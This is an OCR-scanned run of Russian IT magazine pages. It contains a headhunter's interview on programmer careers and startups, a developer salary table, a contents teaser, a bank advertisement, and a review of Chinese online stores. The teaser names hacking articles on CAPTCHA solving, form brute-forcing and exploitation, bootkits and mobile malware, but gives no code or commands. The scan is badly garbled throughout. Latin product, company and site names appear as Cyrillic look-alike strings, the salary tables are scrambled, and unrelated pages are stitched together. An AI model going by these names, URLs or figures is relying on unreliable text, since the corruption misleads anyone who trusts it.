новятся мобильные и планшетники. 

Почему это важно с точки зрения 
карьеры? Потому, что програм- 
мисты, и продакт-менеджеры, 
и всё, что сегодня делается для 
мобильных платформ (І05, 

АпсІгоісІ, ЗуппЫап, ѴѴіпсІоѵѵз 
РЬопе), — всё востребованно. И будет 
востребованно. Зарплаты растут по всем 
направлениям. 

Интернет становится всё более сегмен- 
тированным. Раньше вы могли строить 
карьеру следующим образом: сегодня я 
РМ (Ргобисі тападег), завтра занимаюсь 
маркетингом, послезавтра — снова РМ, 
дальше вообще главный редактор. Сей- 
час, к сожалению или к счастью, всё больше 
требуется узкая специализация. Тот же марке- 
тинг начинает делиться на кучу направлений: 
воттрафик, вот контент, вот брендинг и так 
далее. Надо выбрать одно направление: если 
пять лет назад вы могли бы спокойно перейти 
из сегмента брендинга в сегмент, связанный 
с трафиком, то сегодня это будет довольно 
сложно. 

В интернет пришло множество не интернет- 
ных компаний. Например, МТС с ОтІеСги, 
«Связной» с Епіег.ги и т. д. — их очень много. 
Они заинтересованы в привлечении 
большого количества людей. Денег 
у них тоже много, они даже могут вы- 
делять внутренние стартапы. 

Не бойтесь уезжать учиться по хоро- 
шим, интересным зарубежным про- 
граммам. Вы всегда сможете вернуться, 
если захотите. Но вернетесь более 
востребованными. Более того, смо- 
жете, скорее всего, поднять там денег 
и вернуться уже не в статусе наемно- 
го работника, а в статусе создателя 

бизнеса. Классический 
пример — Сергей Фаге 
и его Озігоѵок.ги. Таких 
примеров довольно много. 

По сравнению с объемами 
общего бизнеса ниша, связанная 
с информационной безопасно- 
стью, незначительна и несерьезна. 

Спрос на специалистов, занимающих- 
ся информационной безопасностью, 
крайне мал. Но то, что он растет, — факт. 

Особенность зарождающегося тренда со- 
стоит в том, что вилка зарплат чрезвычайно 
велика: сумма может варьироваться от очень 
небольшой до действительно крупной. Когда 
приходят подобные запросы из банков, речь 



идет о зарплатах от 200 000 рублей и выше. Это 
понятно — очень большая степень ответствен- 
ности. У нас были такие запросы от банков, ко- 
торые проходили, видимо, по верхней границе 
диапазона — 180-200 тысяч рублей. Порталы 
предлагали меньше — порядка 100-120 
тысяч. Бывали запросы и от системных 
интеграторов, там где-то порядка 140 
тысяч. Это цены по Москве. 



КАРЬЕРА ПРОГРАММИСТА 



Сегодня самое прекрасное 
—быть программистом. 

Вы понимаете основы бизнеса, основы 
профессии, вас легче всего поднимать 
и растить. Ведь бизнес — он не про сер- 
вера. В основе нашего бизнеса лежит код. 
Это и есть платформа. Поэтому, если вы 
умеете программить, ваша карьера будет 
развиваться настолько, насколько вы за- 
хотите расти и насколько этому помешает 
личная жизнь. 

У программиста много путей развития. 

Первый — вы можете всю жизнь любить код. 

В таком случае вы сначала становитесь про- 
граммистом, потом руководителем группы, по- 
том руководите разработкой крупного портала. 
Это если вы не хотите останавливаться. Или 
второй вариант — сначала вы работаете про- 
граммистом, а потом РМ'ом технологического 
проекта. Затем делаете свой стартап или, если 
это технологическое направление вообще 
выделяется в отдельный бизнес при портале, 
руководите уже целым направлением. Класси- 
ческий пример — Леша Терехов. Его я нашла, 
когда он был в маленьком стартапе. Третий ва- 
риант — вы можете очень долго расти, а потом 
стать фактически евангелистом какого-либо 
направления, как Гриша Бакунов в Яндексе. 

Ну и конечно, в ы можете быть программистом, 
прийти в технологическую компанию и дорасти 
до ее гендиректора. :) Это четвертый вариант, 
и в качестве классического примера здесь 
можно привести Дмитрия Гришина, который 
начинал в Моіоіок.ги, а сейчас занимает пост 
генерального директора МаіІ.ги. 



ПРО ТРЕНДЫ 



Нынешние тренды таковы: 

1. РиЬу — за сезон востребованность програм- 
мистов выросла на 86 %, а зарплаты поднялись 
более чем на 40 %. 

2. Всё, что связано с мобильными платформа- 
ми, — и разработка, и маркетинг. 

3. Весь геймдев. 

4. Всё, что связано с е-соттегсе, — вос- 
требованность и зарплаты за последний год 
выросли более чем на 50 %. Это направление 
особенно востребованно. 

Наблюдается острая нехватка разработчи- 
ков І05 и АпсІгоісІ. Бизнес почувствовал, что 
мобильные и планшетные устройства начинают 
всё активнее использоваться для доступа к ин- 
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Интервью с ведущим хедхантером рунета 



тернету вместо стационарных компьютеров. 
Отрасль оказалась к этому не готова ни в плане 
количества, ни в плане качества специалистов. 
Результат — резкий рост востребованности 
и зарплат мобильных разработчиков. 

Уменьшается популярность РНР-шников 
и РегІ-программистов. Если вы занимаетесь 
РегІ, вероятно, вам нужно подумать, на какой- 
то язык переходить. Скорее всего, на РиЬу, так 
как после РегІ перейти на «Рельсы» проще, 
чем на С++ или ^аѵа. 

Интернет — сам по себе тренд. Весь. Всё раз- 
летается как горячие пирожки. 



ПРО ПЕЧЕНЬКИ 



Помимо конкурентной зарплаты и интересной 
работы, всё чаще предлагают гибкий график. 

Это значит, что у тебя есть некоторое количе- 
ство «присутственных дней», за которое ты 
должен отработать определенное количество 
часов в офисе. Это важно, это командная рабо- 
та — ты должен с кем-то общаться и так далее. 
Всё остальное время ты можешь работать где 
хочешь. У тебя просто есть задача, которую ты 
должен выполнять. 

Компании сейчас много учат и отправляют 
на интересные стажировки. Раньше такого 
вообще не было: мало кто был заинтересован 
в системном обучении своих людей. Сейчас же 
компании все чаще стали приглашать зару- 
бежных технологических гуру для внутренних 
выступлений. Это очень ценно и важно. 

На внешней конференции хороший разработ- 
чик чаще всего закрыт ЫОА (Моп-сіівсіозиге 
адгеетепі — Соглашение о неразглашении). 

Он просто не имеет права задавать многие 
вопросы. Все мы на конференциях выглядим 
как дураки: ничего ценного сказать не можем, 
потому что это может помешать нашему бизне- 
су. Поэтому мы говорим какие-то банальности. 
Когда такого гуру привозят в компанию, разра- 
ботчикам спокойнее — никто ничего не укра- 
дет. Они могут спокойно говорить, обсуждать 
какие-то сложные задачи. 

Стартапы пришли с модой предлагать опцио- 
ны. Раньше получить опцион было очень слож- 
но и престижно. Их давали Яндекс, МаіІ.ги, 
и на этом, наверное, можно закончить список. 

К сожалению, сейчас на рынок входят стар- 
тапы часто с некоторым непониманием. Одно 
дело, если ты десять лет работал в Яндексе 
и получил некий опцион, и другое — три меся- 
ца что-то покодил в Островке и тоже получил 
опцион. Мне кажется, это неправильно. Опци- 
он должен быть очень ценной вещью, иначе 
и ценность самой компании как-то падает. 

Большое количество компаний сейчас ищут 

сотрудников в регионах. Ищут как для фи- 
лиалов, так и просто для удаленной работы. 
Иногда компании готовы перевезти сотруд- 



ников в Москву и, к примеру, компенсировать 
затраты на съем жилья, но нельзя сказать, что 
это массовое явление. Однако такие случаи 
учащаются. 

В любой большой компании всегда есть люди, 
которые уже переросли уровень работы 
по найму. Это ценные сотрудники: с ними всё 
хорошо, но оставить их в наемных сотрудниках 
уже невозможно. Не помогут никакие задачи 
и никакая зарплата, поскольку они хотят что- 
то свое. Дмитрий Гришин из МаіІ.ги решил: 
мы сделаем отдельный инкубатор для таких 
людей, дадим им финансирование и не- 
обходимую инфраструктуру, чтобы они 
могли заниматься своими проекта- 
ми. Если улюдей в конечном счете 
ничего не получается, им снова 
предлагают работу по найму. Если 
же получается, МаіІ.ги Сгоир по- 
могает взлететь этому проекту 
максимально высоко. Компа- 
ния дает многое, забирает 
совсем небольшую долю 
и позволяет людям 

делать нечто свое. Одним из таких про- 
ектов сейчас является сервис микро- 
блогов РиІиЬга (І^иІиЬга.сот). 



о ПОИСКЕ РАБОТЫ 



Если человек ищет работу, я сове- 
тую размещать резюме везде. Хуже 
не будет. Поиск работы — это та же 
самая работа. К ней стоит отнестись 
ответственно. 

Не ленись писать в компании на- 
прямую. Составь список компаний, 
которые тебе интересны. Не нужно рассылать 
всем стандартное письмо. Напиши, почему 
ты хочешь работать именно в этой компании. 
Например: «Я хочу в Островок. ру, потому что 
считаю этот стартап очень перспективным, 
мне нравится, как формируется его команда. 
Вообще, мне интересна туристическая тема, 
и я люблю программировать на РиЬу». Вероят- 
нее всего, тебя позовут поговорить. 

Если ты напишешь в 10-15 компаний, то 3-4 
пригласят на собеседование. Найти адреса НР 
совсем несложно: они есть на сайте компаний. 

Принцип «я продаюсь раз в три года» уже 
неактуален. Мы продаемся всё время, мы все 
— товар. Если завтра ко мне придут из боодіе 



и скажут: «Вот тебе доля в компании и не- 
сколько миллиардов, иди делай собственный 
НР-дивизион», я что, откажусь? Нет. Нужно 
понимать, что мир сейчас полон шансов. Шанс 
может появиться в любой день, и очень важно 
быть активным, чтобы повысить вероятность 
этого. Хотя бы вести блог. 

В случае с блогом важно понимать, что он 
может работать как на тебя, так и против. 

Не надо писать: «Я умный и всё знаю, а вы уны- 
лое говно!» Нет! Блог может содержать даже 
очень жесткую критику, но только конкрет- 
ную и обоснованную. Например, можно 
написать что-нибудь вроде «этот интер- 
фейс неправильный потому и потому, 
а правильный должен выглядеть 
так». Если при этом предложить 
свой вариант, то будет вообще 
идеально. Вы должны показы- 
вать себя профессионалом. 

Возможно, проект, который 
вы только что критиковали, 
вас и позовет. 

Я сама довольно много и часто хантила 
на технических конференциях. Я 

мало что понимаю там на технической 
секции, но вижу мальчиков с горящи- 
ми глазами, задающих правильные 
вопросы. Докладывает, к примеру, 
Игорь Сысоев, а мальчик из зала за- 
дает ему явно правильный вопрос — я 
к нему подхожу, даю телефон и зову 
к нам на тестирование. Даже если 
я не до конца понимаю сам вопрос, 
по реакции докладчика я вижу, что он 
правильный. 

Все более-менее приличные зарплаты, как 
правило, закрыты определением «цена дого- 
ворная». Есть причина — для них существует 
вилка. То есть у НР в таком случае нет конкрет- 
ной установки «мы нанимаем чувака за 90 
тысяч рублей». Поэтому они решают: а давайте 
посмотрим чуваков в диапазоне от 60 до 120 
тысяч. Если специалист будет очень хороший 
— заплатим ему 150, если не очень — запла- 
тим 60. Вот в этой вилке они свободны. 



СОВЕТЫ СТУДЕНТАМ 



Еще несколько лет назад считалось, что 
учиться и работать одновременно — хорошо. 

Но если ты учишься в Бауманке и при этом ра- 
ботаешь в Макдональдсе — это плохо. Не могу 



СЕГОДНЯ САМОЕ ПРЕКРАСНОЕ — БЫТЬ 
ПРОГРАММИСТОМ. ВЫ ПОНИМАЕТЕ ОСНОВЫ 
БИЗНЕСА, ОСНОВЫ ПРОФЕССИИ, ВАС ЛЕГЧЕ 
ВСЕГО ПОДНИМАТЬ И РАСТИТЬ 
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сказать, что я это осуждаю, ведь ситуации 
у людей бывают разные, и иногда это просто 
вопрос выживания. 

Работать во время учебы крайне желательно 
не ради денег, а для выбора того, чем зани- 
маться в будущем. Это отличное время, чтобы 
определиться с направлением дальнейшей 
деятельности. 

Далеко не все с первого раза нащупывают, 
чего хотят. Если, будучи студентом, ты меня- 
ешь работу раз в три месяца — это не страшно. 
Ты интуитивно нащупываешь, чего хочешь. Что 
самое важное: к последнему курсу ты должен, 
поработав в разных местах и пройдя стажи- 
ровку в разных компаниях, определиться, кем 
ты хочешь быть. Условно говоря, «маркетинг 

— не мое, верстка — не мое, а вот разработка 

— да!». Вот это будет хорошо. 

К окончанию учебы важно нарастить свою 
техническую компетенцию. Или, продукто- 
вую, если ты РМ, или маркетинговую, если 
специализируешься на маркетинге. 

Если человек правильно думает и имеет 
бэкграунд, у него всё получится. За такими 
людьми гоняются крупные порталы и старта- 
пы, набирающие обороты, — все! 

Не стоит особенно рассчитывать на стажиров- 
ку в большой компании. Все порталы пред- 
лагают стажировки, но на деле не очень 
любят брать стажеров, так как с ними 
приходится возиться и устанавливать 
для них неполный рабочий день, что мало 
кого устраивает. 

У большинства порталов сейчас суще- 
ствуют школы и ученические програм- 
мы. Например, у Яндекса есть Школа 
анализа данных. Если хорошо пройдешь 
такую программу и хорошо 
отучишься, тебе с большой ве- 
роятностью предложат работу. 

Можно очень хорошо показать 
себя на олимпиадах по программи- 
рованию. Они проводятся в Яндексе, 

МаіІ.ги, Ооодіе — там есть специальные 
подразделения для студентов. Если ты 
хорошо себя показал, тебе сразу же сделают 
предложение. 

Студент, как ни странно, может сделать хоро- 



ший стартап. Хороший не в плане успешности 
с точки зрения бизнеса — потенциального 
работодателя это мало интересует. Крупным 
компаниям гораздо важнее увидеть в вас 
человека, который мыслит в правильном 
направлении и умеет кодить руками. 
Порталам нужно всё, что связано 
с технологиями, видео, мобильны- 
ми платформами, социальными 
сетями, — это основные вещи, 
которые востребованы всегда 
и всеми. 

Чем может быть хорош 
первый стартап? Пока 
вы учитесь, скажем, в Бауманке, вы 
что-то делаете, вы пробуете. Вы смо- 
трите и понимаете, что вам интересно, 
набиваете первые шишки. 

Не надо огромного количества тусовок 
вроде стартаперских. Люди там не ра- 
ботают, они ходят и трындят ни о чем. 
Ценность таких людей нулевая. 

Меня пугают люди, которые в 19 лет 
заявляют: «Я специалист по формиро- 
ванию бренда!» 



о СТАРТАПАХ 



Большинство стартапов на рынке — унылое 
говно. Именно поэтому у нас раз в пол года вы- 
ходит рейтинг «30 лучших команд стар- 
тапов Рунета». Зачем мы его выпускаем? 
Затем, что сейчас очень много «пены», 
ведь рыноктолько развивается. И очень 
важно объяснить молодому человеку, ко- 
торый не всегда сам хорошо это понимает, 
что не нужно идти в плохую компанию: 
там обманут, ничему не научат и вообще 
будет «стресс, ад и всё плохо». 

Скажу страшное — не делайте 
стартапы. Хотя нет, не так. Де- 
лайте стартапы, но не связывай- 
те с ними свою основную карьеру. 

Фактически ни у кого, кто начинал 
свою карьеру со стартапов, ничего 
не получилось. Нужно быть гением уров- 
ня Цукерберга, но тогда и никакие правила 
для вас вообще не действуют. Спасибо, что 
вы просто есть! :) 

Почему не получаются первые стартапы? 



Потому, что люди не представляют, каков 
на самом деле интернет. Они не представляют, 
что на самом деле нужно, а также не со- 
размеряют собственные силы и средства. 

Не хватает опыта, связей, терпения, 
денег и всего прочего. Делайте стартап, 
пока учитесь, — мы вас заметим. 

Идите работать в большую, 
серьезную компанию, где вас 
научат качественному про- 
граммингу, качественному 
маркетингу. Вы просто 
посмотрите на интернет 
не взглядом студента, 
не снизу. Вы посмотрите из того же 
Яндекса, МаіІ.ги, из какой-либо запад- 
ной компании, то есть сверху. Плюс вы 
обрастете связями, ведь любой портал 
дает очень хорошую возможность об- 
расти связями. 

У вас будут связи, у вас будет по- 
нимание, вы обрастете костяком 
команды. Не будет вот этого: «Это мой 
друг, я с ним пиво пил». Будет другое: 
«Это офигенный программист, я с ним 
работал в одном отделе, мы сошлись 
с ним на общей теме, и нам интересно 
общаться». У вас появится какое-то коли- 
чество свободных денег — сейчас в рунете 
хорошо зарабатывают. Вам будет легче под- 
нять инвестиции, если вы скажете: «Я три года 
программил почту в Яндексе, а теперь у меня 
есть вот такой проект». Вам, скорее, дадут эти 
деньги, потому что у вас есть некий подтверж- 
денный опыт и вы, вероятно, действительно 
что-то сделаете. 

Я считаю, что свои стартапы нужно делать по- 
сле 28-29 лет, предварительно поработав. 

Мы очень часто ищем людей для стартапов. 
Мало компаний за это берется. У нас есть ряд 
программ, в том числе платная программа 
со льготными расценками для стартапов. Есть 
и бесплатная, совместно с ЗгеепЯеІсІ Рго]'есЕ 
Мы всё равно изначально оцениваем, насколь- 
ко стартап живучий. Если стартап нормаль- 
ный, но у него пока просто нет денег, чтобы нам 
платить, мы пиарим вакансию за счет своих 
возможностей. 

Стартапы на посевной стадии — это во многом 
дело Хантеров. Потому что риск на этапе реа- 
лизации идеи минимален. 

Главный риск всегда связан с командой. 

Сделают эти люди проект или нет, смогут или 
не смогут? Оценить всё это на старте, хеджи- 
ровать эти риски чрезвычайно важно. Поэтому, 
когда стартапы только начали зарождаться, 
агентство РРСІРРІ было первым, кто пошел 
оценивать всё это с точки зрения людей. Мы 
очень много сделали в этом смысле, поэтому, 
конечно, нам было интересно изучить старта- 
пы изнутри . ^ 



ДАЛЕКО НЕ ВСЕ С ПЕРВОГО РАЗА 
НАЩУПЫВАЮТ, ЧЕГО ХОТЯТ. ЕСЛИ, БУДУЧИ 
СТУДЕНТОМ, ТЫ МЕНЯЕШЬ РАБОТУ РАЗ В ТРИ 
МЕСЯЦА— ЭТО НЕ СТРАШНО. 
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Зарплаты специалистов 

(1 сентября-1 декабря 2011 года) 



РАЗРАБОТЧИКИ 












Профессия \ опыт работы 


0-3 года 


3-5 лет 


5-10 лет 


болееЮ лет 


Теат Іеасіег 


40 000 - 80 000 

30 000 - 70 000 * 


70 000 - 150 000 

70 000 - 180 000 * 


170 000 - 250 000 

180 000 - 250 000 * 


250 000 -... 

250 000 -...* 


Разработчик под платформы 
АпсІгоісІ, І05 


30 000 - 70 000 

20 000 - 70 000 * 


70 000 - 120 000 

50 000 - 90 000 * 


120 000 - 150 000 

90 000 - 120 000 * 


150 000 -.. . 

120 000 - 150 000 * 


Разработчик РегІ/РНР 


40 000 - 60 000 

30 000 - 60 000 * 


70 000 - 110 000 

60 000 - 100 000 * 


90 000 - 150 000 

90 000 - 120 000 * 


150 000 -... 

120 000 - 150 000 * 


Разработчик РиЬу оп Раііз 


30 000 - 60 000 


70 000 - 100 000 


100 000 - 150 000 


150 000 -... 



СИСТЕМНЫЕ АДМИНИСТРАТОРЫ 








Профессия \ опыт работы 


0-3 года 


3-5 лет 


5-10 лет 


болееЮ лет 


Ведущий ѴѴІПСІ0ѴѴ5 
администратор 


30 000-50 000 


50 000 - 70 000 


80 000- 100 000 


100 000-... 


ипіх.ііпихасітіп 


30 000 - 60 000 

20 000 - 60 000 * 


60 000 - 90 000 

60 000 - 90 000 * 


90 000 - 110 000 

90 000 - 110 000 * 


110 000 -... 

130 000 - 150 000 * 


ОВА (Огасіе, МуЗдІ, Розідгез и 
т.д.) 


40 000 - 80 000 

40 000 - 80 000 * 


80 000 - 130 000 

80 000 - 130 000 * 


130 000 - 150 000 

130 000 - 150 000 * 


150 000 - 180 000 

150 000 - 180 000 * 


Руководитель группы 
системных администраторов 




90 000 - 150 000 

90 000 - 150 000 * 


150 000 - 180 000 

150 000 - 180 000 * 


180 000 - 250 000 

180 000 - 250 000 * 



ОАМЕ ИНДУСТРИЯ 













Профессия / опыт работы 


0-3 года 


3-5 лет 


5-10 лет 


болееЮ лет 


Веб-разработчик 


40 000 - 80 000 


80 000 - 150 000 


150 000 - 200 000 


200 000 -... 


40 000 -80 000 * 


80 000 - 130 000 * 


130 000 - 150 000 * 


150 000 - 180 000 * 


РІазІі-разработчик 


40 000 - 80 000 


80 000 - 150 000 


150 000 - 200 000 


200 000 -... 


40 000 -80 000 * 


80 000 - 150 000 * 


150 000 - 200 000 * 


200 000 - 230 000 * 


бате ргосіисег 


40 000 - 70 000 


70 000 - 120 000 


120 000 - 200 000 


200 000 -... 


40 000 - 90 000 * 


90 000 - 120 000* 


120 000- 150 000 * 


150 000 - 180 000 * 



востребованность осталась на прежнем уровне 
востребованность увеличилась более чем на 50% 




востребованность увеличилась менее чем на 50% 
востребованность уменьшилась менее чем на 50% 



* Заработная 
плата прошлого 
квартала 
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Зарплатная аналитика кадрового агентства РРЦРРІ (ѵѵѵѵѵѵ.ргиЦі.ги/апаІіІіка) 











33 страницы журнала на одной полосе. 
Тизер некоторых статей. 



Ргеѵіе\л/ 



РС20МЕ 



38 



ВКИТАЙЗАПОКУПКАМИ? 

Сотни тысяч товаров по самым низким 
ценам — гдеещеты найдешьтакое 
предложение, если не в китайских 
интернет-магазинах? Та кого нет даже 
наеВау! Близостькпроизводствуи 
огромная конкуренция играютнаруку 
покупателям. Из Китая можнозаказать 
самого черта и по самой низкой цене. 

При этом тебе не нужно морочиться с 
оплатой доставки — все издержки берет 
насебя продавец. Мы подготовили 
для тебя обзор проверенных торговых 
площадок, где приобести интересую- 
щий товар ты можешь с минимальным 
риском. Обсудим мы и важные советы по 
онлайн-покупкам с учетом специфики 
поставщиков из Поднебесной. 




РС20МЕ 



ВЗЛОМ 






ПРОВЕРКАНАПРОЧНОСТЬ 




ФРЕИМВОРКДЛЯХАКЕРА 




42 


Наша задача — автоматизированно 


48 


Анализ структуры сайта, брутфорс форм. 


66 




решить САРТСНА. Какэтосделатьбез 




поиск уязвимостей, эксплуатация дырок. 





реализации фильтров, сложных нейрон- обход 105 — лишьмалаячастьтого, на что 

ныхсетей и ОСР-систем? способны плагины проекта ѵѵЗаТ 



ІСАМСВАСКІТ! 

Управление правительственной связи 
Великобритании недавно опубликовало 
задачки для хакеров. Мы решили их по- 
смотреть и заодно решили. 



ВЗЛОМ 



МАШАВЕ 






70 



ФАЛЬШИВЫЕ СМС 

Партерка-приманка-подписка — взгляд 
изнутриотом, как устроены и на чем 
зарабатывают многочисленные СМС- 
лохотроны. 



76 



ВЕСЕЛАЯ ТРОЙКАБУТКИТОВ 

Самыетехнологичныеугрозы 2011 года в 
веселых картинках. Кто из разработчиков 
малвариудивил антивирусныханалити- 
ковбольше всего? 



82 



МАЛВАРЬДЛЯМОБИЛЬНЫХОКОШЕК 

Вирусов для ѴѴіпсІоѵѵв РИопе 7.5 пока 
нет. Но появятся ли они в будущем? 
Разбираемся во внутренностях новой 
мобильной ОСотМісгозо^С 



036 
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на правах рекламы 




Оформить дебетовую или кредитную «Мужскую карту» можно в отделениях 
ОАО «Альфа-Банка», а так же заказав по телефонам: 

(495) 229-2222 в Москве 1 8-800-333-2-333 в регионах России (звонок бесплатный) 

или на сайта 

ѵѵѵѵѵѵ.тапсагс1.т 



(дате)іапіі 







РС20ЫЕ 



Роман Володин (ЬіоНесІдегадтаіІ.сот) 



Китаи 



СЕМЬ китайских интернет- 
магазинов СО ВСЯКОЙ всячиной 



Где максимально дешево можно купить планшетник на АпсІгоісІ? 
Или осциллограф? Или, к примеру, лазер? А запчасти для разбитого 
смартфона? Да там же, где и десятки тысяч других самых разных 
товаров, которые в огромных количествах штампуются в Поднебесной 
— в китайских интернет-магазинах. И, что важно, по самым 
доступным ценам. 



МАОЕІМ СНІМА 



О нескольких из них -тех, с которыми имел 
дело либо я сам, либо мои друзья. Сразу хочу 
предупредить, что выбор магазина — вопрос 
субъективный. Передлюбой покупкой обяза- 
тельно почитай отзывы и имей в виду — всегда 
есть некоторая вероятность, что посылка 
потеряется, что товар окажется бракованным, 
что в коробку положат что-то не то или соберут 
комплект не полностью — такое случается 
везде, без исключений. Но за те цены, которые 
предлагают подобные магазины, многие гото- 
вы с этим мириться. Приступим? 



Три знакомых слова «Мабе іп СЫпа» давно 
обосновались на огромном количестве все- 
возможных товаров, в особенности на технике, 
Глупо было бы предполагать, что рядом с про- 
изводством не появятся огромные интернет- 
магазины, где всё это добро можно купить 
по максимально низкой цене. Думаю, многие 
слышали о наиболее раскрученном магазине 
— ОеаІЕхІгете.сопп, — даже если еще ничего 
в нем не заказывали. Но подобных магазинов 
довольно много. Сегодня я хочу рассказать 
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в Китай за покупками? 




РосаІРгісе.сош 

Категории товаров: НІЕігП 

Способы оплаты: 

(не для всех товаров) 

Срок доставки: от 14 до 25 дней 

Один из лидеров китайской электронной 
коммерции предлагает более 70 000 наимено- 
ваний товаров в почти 100 категориях (гадже- 
ты, аксессуары к ним и так далее). По край- 
ней мере, так он сам заявляет. Проверить эти 
данные сложно, но то, что здесь можно найти 
самого черта, — это точно. В ассортименте 
магазина имеются копии именитых брендов 
(ох уж эти китайцы), телефоны и оргтехника 
вполне приемлемого качества (судя и по лич- 
ному опыту, и по отзывам). 

Первое, что привлекло меня при знаком- 
стве с магазином, — это цены. У некоторых 
товаров они были ниже, чем на еВау (да-да, 
китайцы продают немало своего товара 
и на западном аукционе, но мы этот момент 
рассматривать не будем). Как оказалось поз- 
же, возможность продавать по ценам ниже 
рыночных обусловлена территориальной бли- 
зостью магазина к заводам-изготовителям. 
Более того, «Фокал» открыто предлагает 
оставить на форуме магазина сообщение 
о том, что ты нашел какой-либо из това- 
ров дешевле, — в таком случае цена будет 
пересмотрена. Посетителям также доступен 
раздел со спецпредложениями, которые 
отсортированы по ценам, начиная от одного 
доллара. Для сомневающихся или новичков 



этот раздел может служить «песочницей», 
где можно купить прикольную мелочевку 
и присмотреться к сервису, не тратя значи- 
мых сумм. 

Каждый товар имеет описание, рейтинги 
и отзывы, которые помогут сделать выбор. 
Для оплаты можно использовать РауРаІ. 

С недавних пор РосаІРгісе стал принимать 
и ѴѴеЬМопеу, но пока не для всех товаров. 
Магазин часто проводит различные акции, 
а для некоторых предложений есть ски- 
дочные купоны, коды которых можно найти 
в интернете. 

Что касается доставки, то она бесплатная, 



как у почти всех магазинов такого плана. 
Впрочем, доставка, как и везде, может затя- 
нуться. Обычно посылка приходит не раньше, 
чем через две недели. Если ты сделаешь за- 
каз свыше $20, то «Фокал» любезно привяжет 
к твоей посылке трек-номер для отслежива- 
ния статуса отправления. 

В целом ресурс оставляет приятное впе- 
чатление, но, судя по отзывам, и он не лишен 
всех стандартных проблем «китайских» 
магазинов: задержки, недокомплект, несоот- 
ветствие характеристикам. 



ШЕСТЬ СОВЕТОВ ДЛЯ НАЧИНАЮЩИХ 



1 . Купоны — это отличная возможность сэкономить немного денежек. Причем получить код купона 
совсем не сложно: их раздают на сайтах вроде ге1:аіІппепоЕсопп (крупнейший, но англоязычный 
ресурс), сЫпаргісез.ги. а также в тематических сообществах. В конце концов, можно банально 
вбить в поисковик «купон на скидку <имя магазина>». 

2 . Чтобы быстро найти интересующий тебя товар и сравнить цены, можно попробовать сначала 
воспользоваться специализированными поисковиками. Например зеагсИзки.ги ищет 

по двадцати разным магазинам. Такой же сервис есть и на сайте сЫпаргісез.ги . 

3 . Перед покупкой не поленись полазить по форумам, почитать информацию отом или ином 
магазине — это может здорово помочь. Изучай площадки. Изучай, изучай и еще раз изучай. 
Сообществ шопоголиков сейчас хватает — к примеру, форумы еЬаѵ-Ьгигті.ги и гпѵЗки.ги . 

4 . Если вдруг произошла какая-то накладка (допустим, при отправке, доставке) или есть вопросы 
по ассортименту — не стесняйся писать в поддержку. В штате некоторых магазинов даже есть 
русскоговорящие сотрудники. 

5 . При оплате заказа нужно использовать только проверенную платежную систему. В большинстве 
случаев это РауРаІ. Некоторые китайские магазины поддерживают ѴѴеЬМопеу и даже Оіѵѵі, но, 
тем не менее, я рекомендую использовать РауРаІ — они очень ловко умеют решать проблемы 

с нерадивыми продавцами. 

6 . Терпение, терпение и еще раз терпение. Заказывая через интернет, нужно быть готовым 
подождать. Заказ могут долго формировать, долго отправлять, а затем задержать на таможне 
или на каком-нибудь этапе работы многострадальной Почты России. 



КАТЕГОРИИ ТОВАРОВ 



ш 


Мелкая 

электроника 


□ 


г 


Товары для 
автомобиля 


□ 


в 


Сувениры 


□ 


в 


Бижутерия 


в 


□ 


Товары для 
здоровья 


□ 


в 


Товары для 
детей 


в 



Товары для 
дома 

Игрушки 



Часы 



Спортивные 

товары 

Одежда 



Музыкальные 

инструменты 



СПОСОБЫ ОПЛАТЫ 

РауРаГ 



ШеЬШоп^у 







РауРаІ 

ѴѴеЬМопеу 

Оіѵѵі 

Кредитные карты 
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РС20ЫЕ 




Оеаіехігете.сот 

Категории товаров: 

Способы оплаты: 

Срок доставки: от 21 до 40 дней 

Сложно не упомянуть один из самых извест- 
ных китайских магазинов — РеаІЕхІгете.сопп . 
Свой первый опыт покупки в китайских 
интернет-магазинах я получил именно здесь. 
Чего я только не заказывал: и защитные 
пленки, и батарейки, и фонарики, и экран для 
телефона, и всевозможные аксессуары. Рас- 
сказывать тут особенно и нечего: этот ресурс 
уже опробовали тысячи людей. Основное на- 
правление магазина — гаджеты, представлен- 
ные в астрономических количествах и по очень 
привлекательным ценам. Есть двухдолларо- 
вая зона для мелочевки, разделы новинок 
и спецпредложений. Аналогично ТіпуОеаІ, 
ресурс предлагает зарабатывать и копить 
бонусные баллы, публикуя описания или видео 
к товарам. Выполнить оплату клиент может 
через РауРаІ или с помощью кредитной карты, 
при этом за доставку никто ничего не возьмет. 



Отследить отправление можно по трек-номеру, 
который предоставляется бесплатно при за- 
казе свыше $15. Учитывая собственный опыт 
и отзывы на форумах, можно резюмировать: 
Оеаіехігете — достойный магазин, у которого 
всего один недостаток: серьезная медлитель- 
ность (посылку можно ждать больше месяца). 



что связано с громадным количеством заказов. 

Итог: один из самых раскрученных мага- 
зинов. Но если тебе нужно получить товар как 
можно быстрее, то лучше воспользоваться 
другим ресурсом, особенно это касается людей, 
которые занимаются дропшиппингом (посред- 
ничеством). 




ТіпусІеаІ.сот 

Категории товаров: 

ШЕ1ЕІОВВП 

Способы оплаты: & 

Срок доставки: от 7 до 25 дней 

В ассортименте онлайн-магазина пред- 
ставлены электроника, уникальные гаджеты 
и множество самых разных товаров, причем 
каждый месяц появляется несколько тысяч 
новинок. Для каждой позиции представлены 
подробное описание, рейтинги и отзывы, 
а иногда видео и русскоязычные коммен- 
тарии. Порадовал также онлайн-чат, где я 
смог быстро получить ответы на интере- 
сующие меня вопросы, причем на русском 
языке. На сайте есть раздел спецпредло- 
жений с еженедельными скидками, а также 
пятидолларовая зона для мелких товаров. 
Цены более чем приемлемые, дополнительно 
в интернете можно найти купоны на скидки 
(5-7%). Плюс ко всему прочему есть воз- 
можность покупать товары за баллы (так 
называемые ТО Роіпіз), которые начисляются 
за публикацию комментариев и обзоров. 
Приятный бонус — при заказе на сумму 
свыше $200 тебе предложат выбрать один 
из нескольких возможных небольших по- 



дарков. Помимо РауРаІ, к оплате принима- 
ются кредитные карты и ѴѴеЬМопеу. Впро- 
чем, я все равно настоятельно рекомендую 
осуществлять все сделки через РауРаІ — это 
более надежно, легче оспорить транзакцию. 
К тому же на оплату картами сейчас действу- 
ет ограничение в $150. 

Доставка в любую точку мира бесплатна. 
Посылка идет, как и везде,две-три недели (бы- 
вает, что доходит и за неделю, но это случается 
редко). Трек-номер для отслеживания посылки 
выдается при заказе свыше $35, но тут есть 



один нюанс: если в твоем заказе несколь- 
ко товаров, то для получения бесплатного 
трекинг-номера цена хотя бы одного из них 
должна быть выше $20. В противном случае 
за трекинг придется доплатить $2-3. Первой 
моей покупкой в этом магазине был телефон, 
и всё прошло как нельзя лучше. 

